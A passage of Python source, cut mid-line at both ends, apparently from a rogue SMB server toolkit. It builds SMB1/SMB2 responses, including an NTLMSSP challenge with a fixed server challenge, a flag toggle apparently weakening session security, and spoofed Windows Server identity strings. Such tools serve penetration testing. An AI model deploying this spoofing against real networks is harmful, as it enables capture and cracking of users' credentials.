ields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
|
|
AsnLenStart = str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
|
|
AsnLen2 = str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
|
|
MechTypeLen = str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])
|
|
Tag3Len = str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
|
|
|
|
self.fields["Bcc"] = StructWithLenPython2or3("<h",len(CompleteBCCLen1))
|
|
self.fields["InitContextTokenASNLen"] = StructWithLenPython2or3("<B", len(AsnLenStart))
|
|
self.fields["ThisMechASNLen"] = StructWithLenPython2or3("<B", len(str(self.fields["ThisMechASNStr"])))
|
|
self.fields["SpNegoTokenASNLen"] = StructWithLenPython2or3("<B", len(AsnLen2))
|
|
self.fields["NegTokenASNLen"] = StructWithLenPython2or3("<B", len(AsnLen2)-2)
|
|
self.fields["NegTokenTag0ASNLen"] = StructWithLenPython2or3("<B", len(MechTypeLen))
|
|
self.fields["NegThisMechASNLen"] = StructWithLenPython2or3("<B", len(MechTypeLen)-2)
|
|
self.fields["NegThisMech1ASNLen"] = StructWithLenPython2or3("<B", len(str(self.fields["NegThisMech1ASNStr"])))
|
|
self.fields["NegThisMech2ASNLen"] = StructWithLenPython2or3("<B", len(str(self.fields["NegThisMech2ASNStr"])))
|
|
self.fields["NegThisMech3ASNLen"] = StructWithLenPython2or3("<B", len(str(self.fields["NegThisMech3ASNStr"])))
|
|
self.fields["NegThisMech4ASNLen"] = StructWithLenPython2or3("<B", len(str(self.fields["NegThisMech4ASNStr"])))
|
|
self.fields["NegTokenTag3ASNLen"] = StructWithLenPython2or3("<B", len(Tag3Len))
|
|
self.fields["NegHintASNLen"] = StructWithLenPython2or3("<B", len(Tag3Len)-2)
|
|
self.fields["NegHintFinalASNLen"] = StructWithLenPython2or3("<B", len(str(self.fields["NegHintFinalASNStr"])))
|
|
|
|
class SMBSession1Data(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x04"),
|
|
("AndXCommand", "\xff"),
|
|
("Reserved", "\x00"),
|
|
("Andxoffset", "\x5f\x01"),
|
|
("Action", "\x00\x00"),
|
|
("SecBlobLen", "\xea\x00"),
|
|
("Bcc", "\x34\x01"),
|
|
("ChoiceTagASNId", "\xa1"),
|
|
("ChoiceTagASNLenOfLen", "\x81"),
|
|
("ChoiceTagASNIdLen", "\x00"),
|
|
("NegTokenTagASNId", "\x30"),
|
|
("NegTokenTagASNLenOfLen","\x81"),
|
|
("NegTokenTagASNIdLen", "\x00"),
|
|
("Tag0ASNId", "\xA0"),
|
|
("Tag0ASNIdLen", "\x03"),
|
|
("NegoStateASNId", "\x0A"),
|
|
("NegoStateASNLen", "\x01"),
|
|
("NegoStateASNValue", "\x01"),
|
|
("Tag1ASNId", "\xA1"),
|
|
("Tag1ASNIdLen", "\x0c"),
|
|
("Tag1ASNId2", "\x06"),
|
|
("Tag1ASNId2Len", "\x0A"),
|
|
("Tag1ASNId2Str", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
|
|
("Tag2ASNId", "\xA2"),
|
|
("Tag2ASNIdLenOfLen", "\x81"),
|
|
("Tag2ASNIdLen", "\xED"),
|
|
("Tag3ASNId", "\x04"),
|
|
("Tag3ASNIdLenOfLen", "\x81"),
|
|
("Tag3ASNIdLen", "\xEA"),
|
|
("NTLMSSPSignature", "NTLMSSP"),
|
|
("NTLMSSPSignatureNull", "\x00"),
|
|
("NTLMSSPMessageType", "\x02\x00\x00\x00"),
|
|
("NTLMSSPNtWorkstationLen","\x1e\x00"),
|
|
("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
|
|
("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
|
|
("NTLMSSPNtNegotiateFlags","\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"),
|
|
("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"),
|
|
("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
("NTLMSSPNtTargetInfoLen","\x94\x00"),
|
|
("NTLMSSPNtTargetInfoMaxLen","\x94\x00"),
|
|
("NTLMSSPNtTargetInfoBuffOffset","\x56\x00\x00\x00"),
|
|
("NegTokenInitSeqMechMessageVersionHigh","\x05"),
|
|
("NegTokenInitSeqMechMessageVersionLow","\x02"),
|
|
("NegTokenInitSeqMechMessageVersionBuilt","\xce\x0e"),
|
|
("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"),
|
|
("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"),
|
|
("NTLMSSPNtWorkstationName",settings.Config.Domain),
|
|
("NTLMSSPNTLMChallengeAVPairsId","\x02\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairsLen","\x0a\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairsUnicodeStr",settings.Config.Domain),
|
|
("NTLMSSPNTLMChallengeAVPairs1Id","\x01\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs1Len","\x1e\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs1UnicodeStr",settings.Config.MachineName),
|
|
("NTLMSSPNTLMChallengeAVPairs2Id","\x04\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs2Len","\x1e\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs2UnicodeStr",settings.Config.MachineName+'.'+settings.Config.DomainName),
|
|
("NTLMSSPNTLMChallengeAVPairs3Id","\x03\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs3Len","\x1e\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs3UnicodeStr",settings.Config.DomainName),
|
|
("NTLMSSPNTLMChallengeAVPairs5Id","\x05\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs5Len","\x04\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs5UnicodeStr",settings.Config.DomainName),
|
|
("NTLMSSPNTLMChallengeAVPairs6Id","\x00\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs6Len","\x00\x00"),
|
|
("NTLMSSPNTLMPadding", ""),
|
|
("NativeOs","Windows Server 2003 3790 Service Pack 2"),
|
|
("NativeOsTerminator","\x00\x00"),
|
|
("NativeLAN", "Windows Server 2003 5.2"),
|
|
("NativeLANTerminator","\x00\x00"),
|
|
])
|
|
|
|
def calculate(self):
|
|
###### Convert strings to Unicode
|
|
self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NativeLAN"] = self.fields["NativeLAN"].encode('utf-16le').decode('latin-1')
|
|
|
|
###### SecBlobLen Calc:
|
|
AsnLen = str(self.fields["ChoiceTagASNId"])+str(self.fields["ChoiceTagASNLenOfLen"])+str(self.fields["ChoiceTagASNIdLen"])+str(self.fields["NegTokenTagASNId"])+str(self.fields["NegTokenTagASNLenOfLen"])+str(self.fields["NegTokenTagASNIdLen"])+str(self.fields["Tag0ASNId"])+str(self.fields["Tag0ASNIdLen"])+str(self.fields["NegoStateASNId"])+str(self.fields["NegoStateASNLen"])+str(self.fields["NegoStateASNValue"])+str(self.fields["Tag1ASNId"])+str(self.fields["Tag1ASNIdLen"])+str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])+str(self.fields["Tag2ASNId"])+str(self.fields["Tag2ASNIdLenOfLen"])+str(self.fields["Tag2ASNIdLen"])+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"])
|
|
CalculateSecBlob = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NTLMSSPNtWorkstationName"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
|
|
|
|
###### Bcc len
|
|
BccLen = AsnLen+CalculateSecBlob+str(self.fields["NTLMSSPNTLMPadding"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLAN"])+str(self.fields["NativeLANTerminator"])
|
|
|
|
###### SecBlobLen
|
|
self.fields["SecBlobLen"] = StructWithLenPython2or3("<h", len(AsnLen+CalculateSecBlob))
|
|
self.fields["Bcc"] = StructWithLenPython2or3("<h", len(BccLen))
|
|
self.fields["ChoiceTagASNIdLen"] = StructWithLenPython2or3(">B", len(AsnLen+CalculateSecBlob)-3)
|
|
self.fields["NegTokenTagASNIdLen"] = StructWithLenPython2or3(">B", len(AsnLen+CalculateSecBlob)-6)
|
|
self.fields["Tag1ASNIdLen"] = StructWithLenPython2or3(">B", len(str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])))
|
|
self.fields["Tag1ASNId2Len"] = StructWithLenPython2or3(">B", len(str(self.fields["Tag1ASNId2Str"])))
|
|
self.fields["Tag2ASNIdLen"] = StructWithLenPython2or3(">B", len(CalculateSecBlob+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"])))
|
|
self.fields["Tag3ASNIdLen"] = StructWithLenPython2or3(">B", len(CalculateSecBlob))
|
|
|
|
###### Andxoffset calculation.
|
|
CalculateCompletePacket = str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["Andxoffset"])+str(self.fields["Action"])+str(self.fields["SecBlobLen"])+str(self.fields["Bcc"])+BccLen
|
|
self.fields["Andxoffset"] = StructWithLenPython2or3("<h", len(CalculateCompletePacket)+32)
|
|
|
|
###### Workstation Offset
|
|
CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
|
|
|
|
###### AvPairs Offset
|
|
CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
|
|
|
|
##### Workstation Offset Calculation:
|
|
self.fields["NTLMSSPNtWorkstationBuffOffset"] = StructWithLenPython2or3("<i", len(CalculateOffsetWorkstation))
|
|
self.fields["NTLMSSPNtWorkstationLen"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
|
|
self.fields["NTLMSSPNtWorkstationMaxLen"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
|
|
|
|
##### IvPairs Offset Calculation:
|
|
self.fields["NTLMSSPNtTargetInfoBuffOffset"] = StructWithLenPython2or3("<i", len(CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])))
|
|
self.fields["NTLMSSPNtTargetInfoLen"] = StructWithLenPython2or3("<h", len(CalculateLenAvpairs))
|
|
self.fields["NTLMSSPNtTargetInfoMaxLen"] = StructWithLenPython2or3("<h", len(CalculateLenAvpairs))
|
|
|
|
##### IvPair Calculation:
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])))
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])))
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])))
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])))
|
|
self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))
|
|
|
|
class SMBSession2Accept(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x04"),
|
|
("AndXCommand", "\xff"),
|
|
("Reserved", "\x00"),
|
|
("Andxoffset", "\xb4\x00"),
|
|
("Action", "\x00\x00"),
|
|
("SecBlobLen", "\x09\x00"),
|
|
("Bcc", "\x89\x01"),
|
|
("SSPIAccept","\xa1\x07\x30\x05\xa0\x03\x0a\x01\x00"),
|
|
("NativeOs","Windows Server 2003 3790 Service Pack 2"),
|
|
("NativeOsTerminator","\x00\x00"),
|
|
("NativeLAN", "Windows Server 2003 5.2"),
|
|
("NativeLANTerminator","\x00\x00"),
|
|
])
|
|
def calculate(self):
|
|
self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le')
|
|
self.fields["NativeLAN"] = self.fields["NativeLAN"].encode('utf-16le')
|
|
BccLen = str(self.fields["SSPIAccept"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLAN"])+str(self.fields["NativeLANTerminator"])
|
|
self.fields["Bcc"] = StructWithLenPython2or3("<h", len(BccLen))
|
|
|
|
class SMBSessEmpty(Packet):
|
|
fields = OrderedDict([
|
|
("Empty", "\x00\x00\x00"),
|
|
])
|
|
|
|
class SMBTreeData(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x07"),
|
|
("AndXCommand", "\xff"),
|
|
("Reserved","\x00" ),
|
|
("Andxoffset", "\xbd\x00"),
|
|
("OptionalSupport","\x00\x00"),
|
|
("MaxShareAccessRight","\x00\x00\x00\x00"),
|
|
("GuestShareAccessRight","\x00\x00\x00\x00"),
|
|
("Bcc", "\x94\x00"),
|
|
("Service", "IPC"),
|
|
("ServiceTerminator","\x00\x00\x00\x00"),
|
|
])
|
|
|
|
def calculate(self):
|
|
## Complete Packet Len
|
|
CompletePacket= str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["Andxoffset"])+str(self.fields["OptionalSupport"])+str(self.fields["MaxShareAccessRight"])+str(self.fields["GuestShareAccessRight"])+str(self.fields["Bcc"])+str(self.fields["Service"])+str(self.fields["ServiceTerminator"])
|
|
## AndXOffset
|
|
self.fields["Andxoffset"] = StructWithLenPython2or3("<H", len(CompletePacket)+32)
|
|
## BCC Len Calc
|
|
BccLen= str(self.fields["Service"])+str(self.fields["ServiceTerminator"])
|
|
self.fields["Bcc"] = StructWithLenPython2or3("<H", len(BccLen))
|
|
|
|
class SMBSessTreeAns(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x03"),
|
|
("Command", "\x75"),
|
|
("Reserved", "\x00"),
|
|
("AndXoffset", "\x4e\x00"),
|
|
("Action", "\x01\x00"),
|
|
("Bcc", "\x25\x00"),
|
|
("NativeOs", "Windows 5.1"),
|
|
("NativeOsNull", "\x00"),
|
|
("NativeLan", "Windows 2000 LAN Manager"),
|
|
("NativeLanNull", "\x00"),
|
|
("WordcountTree", "\x03"),
|
|
("AndXCommand", "\xff"),
|
|
("Reserved1", "\x00"),
|
|
("AndxOffset", "\x00\x00"),
|
|
("OptionalSupport", "\x01\x00"),
|
|
("Bcc2", "\x08\x00"),
|
|
("Service", "A:"),
|
|
("ServiceNull", "\x00"),
|
|
("FileSystem", "NTFS"),
|
|
("FileSystemNull", "\x00"),
|
|
])
|
|
|
|
def calculate(self):
|
|
## AndxOffset
|
|
CalculateCompletePacket = str(self.fields["Wordcount"])+str(self.fields["Command"])+str(self.fields["Reserved"])+str(self.fields["AndXoffset"])+str(self.fields["Action"])+str(self.fields["Bcc"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsNull"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanNull"])
|
|
self.fields["AndXoffset"] = StructWithLenPython2or3("<i", len(CalculateCompletePacket)+32)[:2]
|
|
## BCC 1 and 2
|
|
CompleteBCCLen = str(self.fields["NativeOs"])+str(self.fields["NativeOsNull"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanNull"])
|
|
self.fields["Bcc"] = StructWithLenPython2or3("<h",len(CompleteBCCLen))
|
|
CompleteBCC2Len = str(self.fields["Service"])+str(self.fields["ServiceNull"])+str(self.fields["FileSystem"])+str(self.fields["FileSystemNull"])
|
|
self.fields["Bcc2"] = StructWithLenPython2or3("<h",len(CompleteBCC2Len))
|
|
|
|
### SMB2 Packets
|
|
|
|
class SMB2Header(Packet):
|
|
fields = OrderedDict([
|
|
("Proto", "\xfe\x53\x4d\x42"),
|
|
("Len", "\x40\x00"),#Always 64.
|
|
("CreditCharge", "\x00\x00"),
|
|
("NTStatus", "\x00\x00\x00\x00"),
|
|
("Cmd", "\x00\x00"),
|
|
("Credits", "\x01\x00"),
|
|
("Flags", "\x01\x00\x00\x00"),
|
|
("NextCmd", "\x00\x00\x00\x00"),
|
|
("MessageId", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
("PID", "\x00\x00\x00\x00"),
|
|
("TID", "\x00\x00\x00\x00"),
|
|
("SessionID", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
("Signature", "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
])
|
|
|
|
class SMB2NegoAns(Packet):
|
|
fields = OrderedDict([
|
|
("Len", "\x41\x00"),
|
|
("Signing", "\x01\x00"),
|
|
("Dialect", "\xff\x02"),
|
|
("Reserved", "\x00\x00"),
|
|
("Guid", urandom(16).decode('latin-1')),
|
|
("Capabilities", "\x07\x00\x00\x00"),
|
|
("MaxTransSize", "\x00\x00\x10\x00"),
|
|
("MaxReadSize", "\x00\x00\x10\x00"),
|
|
("MaxWriteSize", "\x00\x00\x10\x00"),
|
|
("SystemTime", SMBTime()),
|
|
("BootTime", SMBTime()),
|
|
("SecBlobOffSet", "\x80\x00"),
|
|
("SecBlobLen", "\x78\x00"),
|
|
("Reserved2", "\x00\x00\x00\x00"),
|
|
("InitContextTokenASNId", "\x60"),
|
|
("InitContextTokenASNLen", "\x76"),
|
|
("ThisMechASNId", "\x06"),
|
|
("ThisMechASNLen", "\x06"),
|
|
("ThisMechASNStr", "\x2b\x06\x01\x05\x05\x02"),
|
|
("SpNegoTokenASNId", "\xA0"),
|
|
("SpNegoTokenASNLen", "\x6c"),
|
|
("NegTokenASNId", "\x30"),
|
|
("NegTokenASNLen", "\x6a"),
|
|
("NegTokenTag0ASNId", "\xA0"),
|
|
("NegTokenTag0ASNLen", "\x3c"),
|
|
("NegThisMechASNId", "\x30"),
|
|
("NegThisMechASNLen", "\x3a"),
|
|
#("NegThisMech1ASNId", "\x06"),
|
|
#("NegThisMech1ASNLen", "\x0a"),
|
|
#("NegThisMech1ASNStr", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x1e"),
|
|
("NegThisMech2ASNId", "\x06"),
|
|
("NegThisMech2ASNLen", "\x09"),
|
|
("NegThisMech2ASNStr", "\x2a\x86\x48\x82\xf7\x12\x01\x02\x02"),
|
|
("NegThisMech3ASNId", "\x06"),
|
|
("NegThisMech3ASNLen", "\x09"),
|
|
("NegThisMech3ASNStr", "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02"),
|
|
("NegThisMech4ASNId", "\x06"),
|
|
("NegThisMech4ASNLen", "\x0a"),
|
|
("NegThisMech4ASNStr", "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02\x03"),
|
|
("NegThisMech5ASNId", "\x06"),
|
|
("NegThisMech5ASNLen", "\x0a"),
|
|
("NegThisMech5ASNStr", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
|
|
("NegTokenTag3ASNId", "\xA3"),
|
|
("NegTokenTag3ASNLen", "\x2a"),
|
|
("NegHintASNId", "\x30"),
|
|
("NegHintASNLen", "\x28"),
|
|
("NegHintTag0ASNId", "\xa0"),
|
|
("NegHintTag0ASNLen", "\x26"),
|
|
("NegHintFinalASNId", "\x1b"),
|
|
("NegHintFinalASNLen", "\x24"),
|
|
("NegHintFinalASNStr", "not_defined_in_RFC4178@please_ignore"),
|
|
])
|
|
|
|
def calculate(self):
|
|
|
|
|
|
StructLen = str(self.fields["Len"])+str(self.fields["Signing"])+str(self.fields["Dialect"])+str(self.fields["Reserved"])+str(self.fields["Guid"])+str(self.fields["Capabilities"])+str(self.fields["MaxTransSize"])+str(self.fields["MaxReadSize"])+str(self.fields["MaxWriteSize"])+str(self.fields["SystemTime"])+str(self.fields["BootTime"])+str(self.fields["SecBlobOffSet"])+str(self.fields["SecBlobLen"])+str(self.fields["Reserved2"])
|
|
|
|
SecBlobLen = str(self.fields["InitContextTokenASNId"])+str(self.fields["InitContextTokenASNLen"])+str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFi